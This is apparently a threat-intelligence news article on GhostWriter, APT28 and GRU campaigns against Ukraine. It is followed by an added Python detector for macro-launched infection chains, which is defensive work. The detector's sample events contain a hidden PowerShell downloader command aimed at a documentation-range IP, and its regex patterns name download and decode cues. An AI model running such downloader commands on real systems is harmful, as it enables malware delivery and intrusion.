Government entities, military organizations, and civilian users in Ukraine and Poland have been subjected to a prolonged series of targeted campaigns aimed at stealing sensitive data and establishing persistent remote access to compromised systems.
These attacks, attributed to a threat actor known as GhostWriter, use phishing lures and decoy documents to distribute PicassoLoader malware, which serves as a conduit for launching Cobalt Strike Beacon and njRAT. The attacks involve a multistage infection chain initiated with malicious Microsoft Office documents, predominantly in Excel and PowerPoint formats, followed by an executable downloader and a payload concealed within an image file to evade detection.
While a subset of these attacks has previously been documented by Ukraine’s CERT-UA and Fortinet FortiGuard Labs, the recent disclosure sheds further light on the activities of GhostWriter. The infection chains rely on persuading victims to enable macros, which triggers the deployment of PicassoLoader and subsequent retrieval of the final malware payload embedded within a legitimate image file.
GhostWriter’s priorities are believed to align with those of the Belarusian government. Other threat actors, including the Russian APT28 group, have also targeted Ukraine through phishing emails carrying HTML attachments that prompt recipients to change their passwords on platforms such as UKR.NET and Yahoo!, redirecting them to fraudulent landing pages that harvest credentials.
In addition to GhostWriter’s activities, the adoption of a “standard five-phase playbook” by hackers associated with Russian military intelligence (GRU) has contributed to the escalation of disruptive operations against Ukraine.
This playbook involves compromising edge infrastructure (“living on the edge”), employing living-off-the-land techniques for reconnaissance and lateral movement, establishing persistent access through group policy objects (GPO), deploying wipers, and using Telegram hacktivist personas to publicize their acts. The adoption of this playbook suggests that Russia’s wartime goals have shaped the GRU’s strategic approach, allowing for increased speed, scale, and intensity in its attacks.
The disclosure of these campaigns coincides with CERT-UA’s report on various phishing operations distributing the SmokeLoader malware, as well as a smishing attack targeting Telegram accounts.
The report highlights the ongoing cyber espionage efforts against state organizations and media representatives in Ukraine, where email and instant messengers are used to distribute files that execute PowerShell scripts to retrieve browser stealers and keyloggers. The combined activities of GhostWriter, APT28, and GRU-associated hackers underscore the persistent and multifaceted threats faced by Ukraine’s cybersecurity landscape.
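The macro-initiated chain described earlier (Office document, then a downloader or script host, then a payload fetched from the web) and the PowerShell-driven stealer delivery described above both leave a recognisable trace in process-creation telemetry. The following detector is an added example, not code from the article or from any of the vendors it cites. It assumes Sysmon Event ID 1 style fields (ParentImage, Image, CommandLine), the sample records are constructed, and the image-extension cue is an assumption drawn from the article's note that the payload hides inside an image file.

```python
# Added example (not from the article): flag process-creation events that
# match a macro-launched infection chain. Field names follow Sysmon Event
# ID 1; all sample records below are constructed, not real telemetry.
import re
from typing import Dict, List

# Office hosts that should rarely spawn interpreters or fresh executables.
OFFICE_PARENTS = {"excel.exe", "powerpnt.exe", "winword.exe"}
# Script hosts and living-off-the-land binaries commonly used after a macro runs.
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe",
                "cscript.exe", "mshta.exe", "rundll32.exe", "regsvr32.exe"}
# Locations a document can write to without elevation.
USER_WRITABLE = re.compile(
    r"\\(Users\\[^\\]+\\AppData|ProgramData|Windows\\Temp)\\", re.IGNORECASE)
# Cues for a downloader stage. The image-URL cue is an assumption based on the
# article's note that the final payload is concealed in an image file.
DOWNLOAD_CUES = re.compile(
    r"DownloadString|DownloadFile|Invoke-WebRequest|\biwr\b|Net\.WebClient"
    r"|-enc(?:odedcommand)?\b|FromBase64String"
    r"|https?://\S+\.(?:png|jpe?g|gif)\b",
    re.IGNORECASE)


def basename(path: str) -> str:
    """Lower-cased file name of a Windows path."""
    return path.rsplit("\\", 1)[-1].lower()


def classify(event: Dict[str, str]) -> List[str]:
    """Return the reasons an event looks like a macro-spawned stage (empty if none)."""
    reasons: List[str] = []
    parent = basename(event.get("ParentImage", ""))
    child = basename(event.get("Image", ""))
    cmdline = event.get("CommandLine", "")
    if parent in OFFICE_PARENTS:
        if child in SCRIPT_HOSTS:
            reasons.append(f"{parent} spawned script host {child}")
        elif USER_WRITABLE.search(event.get("Image", "")):
            reasons.append(f"{parent} launched executable from user-writable path")
    if child in {"powershell.exe", "pwsh.exe"} and DOWNLOAD_CUES.search(cmdline):
        reasons.append("powershell command line carries a download/decode cue")
    return reasons


def scan(events) -> Dict[int, List[str]]:
    """Map RecordId -> reasons for every event that triggers at least one rule."""
    return {e["RecordId"]: r for e in events if (r := classify(e))}


# Constructed sample records; 203.0.113.0/24 is a documentation-only range.
SAMPLE_EVENTS = [
    {"RecordId": 1,
     "ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": 'powershell.exe -nop -w hidden -c "(New-Object Net.WebClient)'
                    '.DownloadFile(\'http://203.0.113.10/photo.png\', $env:TEMP)"'},
    {"RecordId": 2,
     "ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXE",
     "Image": r"C:\Users\alice\AppData\Local\Temp\update.exe",
     "CommandLine": "update.exe"},
    {"RecordId": 3,  # benign: an interactive shell listing a folder
     "ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r"powershell.exe -Command Get-ChildItem C:\Users\bob\Documents"},
    {"RecordId": 4,  # benign: Word invoking the 64-bit print spooler helper
     "ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "Image": r"C:\Windows\splwow64.exe",
     "CommandLine": r"C:\Windows\splwow64.exe 12288"},
]

if __name__ == "__main__":
    for record_id, reasons in scan(SAMPLE_EVENTS).items():
        print(record_id, "; ".join(reasons))
```

Record 1 trips two rules (Office parent spawning PowerShell, and a download cue on the command line), record 2 trips the user-writable-path rule, and the two benign records trip none. In production the same logic would sit on a SIEM or EDR query over real Event ID 1 data, and the parent-child rule is the one worth alerting on loudly, since legitimate Office use almost never spawns a script host.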